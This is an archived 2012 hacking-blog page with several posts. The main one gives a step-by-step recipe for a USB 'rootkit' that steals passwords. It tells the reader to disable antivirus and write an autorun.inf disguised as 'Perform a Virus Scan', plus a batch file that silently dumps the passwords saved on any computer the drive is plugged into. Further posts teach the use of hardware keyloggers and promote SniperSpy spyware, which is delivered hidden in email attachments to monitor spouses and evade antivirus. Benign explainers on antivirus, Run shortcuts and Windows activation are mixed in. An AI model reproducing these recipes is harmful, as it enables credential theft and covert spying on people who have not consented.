Find us on Google+ Bypass The Security: 2012

Thursday, 22 November 2012

Hack Passwords Using a USB Drive


How to Hack Passwords Using a USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pendrive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
1.    Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2.    Create a new Notepad and write the following text into it:

[autorun] open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inffile onto your USB pendrive.

3.    Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps:
1.    Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2.    In the pop-up window, select the first option (Perform a Virus Scan).
3.    Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4.    Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Hardware Keylogger


How to Hack Passwords Using a Hardware Keylogger

Do you know that using a keylogger is the simplest way to hack passwords?. In this post I will be giving you a detailed information on hardware keyloggers and their working. I will also teach how to make use of a hardware keylogger to hack passwords on your computer. If you are new to the concept of keyloggers or haven’t heard about this topic in the past, then here is a brief description about keyloggers.
A keylogger or sometimes called as a keystroke logger is a stealth computer program or a stealth device (in case of a hardware keylogger) that when installed, captures every keystroke typed on the computer’s keyboard. The keylogger is designed to operate in a total stealth mode so that it’s presence is hidden from the users of the computer.
A keylogger can be installed by the owner of the computer to capture passwords and other sensitive information that the user types on the keyboard. Keyloggers come in two forms: Software and Hardware.
A software keylogger is a software program that needs to be installed on the computer while the hardware keylogger is a hardware device that needs to be plugged in between the computer and it’s keyboard. For more information on software keyloggers and their usage, you may refer my previous post: How to use Keyloggers?

How Hardware Keyloggers Work?
Unlike the software keylogger, a hardware keylogger do not depend on any of the software program for it’s operation as they function at the hardware level itself. A hardware keylogger acts as an interface between the computer and the computer’s keyboard. The device has a built-in memory in which all the recorded keystrokes are stored.
They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB thumb drive or any other computer peripheral so that it does not arouse suspicion in the minds of the users. Therefore by looking at it’s appearance it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers:

How to Install the Hardware Keylogger?
The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is, you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image illustrates how the hardware keylogger is installed.

Once you install the hardware keylogger as shown above, it starts recording each and every keystroke of the keyboard including passwords and other confidential information. The keystrokes can be retrieved later by downloading the logs onto the hard drive.
Hardware keyloggers are also known to come in the form of a spy keyboard where the keylogger unit is built into the keyboard itself. This will eliminate the need to install a separate device between the keyboard and the computer.

Hardware vs. Software Keylogger:
The following are some of the pros and cons of hardware keylogger:
Pros:
·         Hardware keyloggers are easy to install and uninstall.
·         Since it operates at the hardware level itself, it is fully compatible with all the operating systems like Windows and Unix.
·         Unlike a software keylogger, it cannot be detected by anti-spywares and anti-keyloggers.
Cons:
·         Hardware keyloggers are only limited to capturing keystrokes while a high-end software keylogger can capture screenshots, browser activities, IM conversations and many more.
·         Physical access to the target computer is a must in order to install the hardware keylogger, whereas some software keyloggers come with a remote install/uninstall feature.
·         In case of a software keylogger, it is possible to access the logs remotely as they are emailed on a regular basis while this is not possible in case of a hardware keylogger.

Thus, both hardware and software keyloggers have advantages and disadvantages of their own. So, it is up to the user to make a choice based on the requirement.

U can get one from

Wednesday, 21 November 2012

How Antivirus Software Works


How Antivirus Software Works

Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer.
Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one among those few who would really bother to understand how an antivirus works, then this article is for you.
How Antivirus Works:
An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:
1. Signature-based detection (Dictionary approach)
This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.
As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants so that, the virus can be analyzed and the signature can be added to the dictionary.
Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.
2. Heuristic-based detection (Suspicious behavior approach)
Heuristic-based detection involves identifying suspicious behavior from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.
Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.
For example, malicious behaviors like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.
File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.
Most commercial antivirus software use a combination of both signature-based and heuristic-based approaches to combat malware.
Issues of Concern:

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However, most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.
Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.
Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.
Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.
Hope this helps. Please pass comments.

Customized Run Commands


How to Create Your Own Customized Run Commands


The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command

Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below


3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program. 
Please pass comment friends.

Friday, 16 November 2012

How Windows Product Activation Works


How Windows Product Activation (WPA) Works?

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.
WPA enforces each end user to activate his/her copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.
In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.
Why activation?
Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Hence, WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.
What does “Genuine Windows” means?
The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus, if the same key is used for the installation on another computer, then it is said to be a pirated copy.
Exactly what information is transmitted during the activation?
When you activate your copy of Windows, you are transmitting an Installation ID code to Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive theActivation ID which completes the activation process. If the activation is done through a telephone, the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?
This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer.
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:
·         Display Adapter
·         SCSI Adapter
·         IDE Adapter (effectively the motherboard)
·         Network Adapter (NIC) and its MAC Address
·         RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
·         Processor Type
·         Processor Serial Number
·         Hard Drive Device
·         Hard Drive Volume Serial Number (VSN)
·         CD-ROM / CD-RW / DVD-ROM
Thus, the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.
How is the Installation ID validated?
The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So, after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If so, the Installation ID is instantly validated and the corresponding Activation ID is issued which completes the activation process.
However, Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.
What if a computer running a counterfeit copy of Windows attempts to activate?
The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If so, then it looks to see the Hardware ID associated with it. The computer running a counterfeit copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.
Therefore, for a successful activation, either of the following two cases must be satisfied:
1.    The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
2.    If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?
Each time the hard disk is reformatted and the Windows is re-installed, it needs to be re-activated. However, the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case, both the product key and the Hardware ID will match and hence the activation becomes successful.
What if I upgrade or make changes to my hardware?
In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.
Some things WPA does not do:
·         WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
·         If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
·         WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
·         WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.
I have tried my best to uncover the secret behind the WPA. For further details and more technical information you can read the actual paper by Fully Licensed GmbH at http://www.licenturion.com/xp/fully-licensed-wpa.txt. I hope you like this post. Pass your comments.

Monitoring a remote system


How to Monitor a Remote Computer

Sometimes, it becomes necessary for us to monitor a remote computer to keep track of the activities going on. This may be for several reasons such as to catch a cheating partner or for the parents to monitor the activities of their children during their absence.
To do this, all you need is a good PC Spy/Monitoring Software. But the story doesn’t end here because there exists tons of such spy software programs on the market each having different features and prices. Many of them are no more than a crap but only a few are worth buying.
In this post, I will give you a detailed information on how to monitor a remote computer including which monitoring software to go for, how it works, how to install and use it, their pros and cons and many more.
With my experience, I can tell you that SniperSpy is best option to go for. Here is a detailed review of SniperSpy:

SniperSpy is a cutting-edge Remote Spying Solution that comes with a Remote-Install feature so that you can now install this software on the target computer without the need to have physical access.
This is the only monitoring software on the market with a secure control panel. Remotely view everything your child, employee or spouse does on their computer.

SniperSpy Software Features:
·         Supports Remote Install and Remote Monitoring – No physical access to the target computer is required! Also works on a local computer.
·         100% Undetectable! Operates in a total stealth mode.
·         Completely Bypasses any firewall, even the Windows XP, Vista and 7 firewalls!

With SniperSpy you can record the following activities of the target computer:
·         Actual Screenshots: Captures a full-sized screenshot of the target computer.
·         Websites Visited: Capture a complete log of URLs visited from any browser including IE, Firefox, Chrome and others.
·         Keystrokes in Many Languages: You can capture every keystroke of the target computer including passwords, IM/chat logs etc. not only in English, but also in several other languages.
·         Full Chat Conversations: Records both sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.

Watch the Screen LIVE like a TV and perform the following actions:
·         Reboot/Shutdown/Logoff: You have the option to remotely issue a shutdown/reboot or Logoff command.
·         Remote Uninstall: You also have the option to remotely uninstall the software at anytime from your own computer.

How it Works?


How to Install and Monitor?
The software can be installed by sending an email attachment which contains the installation module. When the target user opens the attachment, the software gets silently installed and the monitoring process will begin.
Deployment is not normally a problem because the small (81kb) module file can be renamed to anything you want and dropped inside a Word, Image or Zip file and sent through many regular email services. This makes the remote installation very easy and stealth.
When you want to view the screen or browse the logged results, simply log in to the Secure Online Control Panel (from any browser – IE, Firefox, Chrome etc.) and enter your username and password. This panel allows you to view the screen, perform commands, search the logs or uninstall the software.
You will get a complete step-by-step instruction and technical support after you download the software.
Supported Operating Systems:
Windows 2000/XP/Vista/7.  Also supports Mac.

FAQs about SniperSpy:
1. Will SniperSpy collect any personal information about me?
No, SniperSpy is completely safe. It neither collects any information about you nor try to contact you in any way.
2. Will SniperSpy can be detected by virus scanners?
No, SniperSpy is intelligently designed to escape from the modern antivirus software. Even if it is found to be detected, an immediate update is released so as to solve this problem. You will also get technical support on all the 7 days to help solve your problems if any.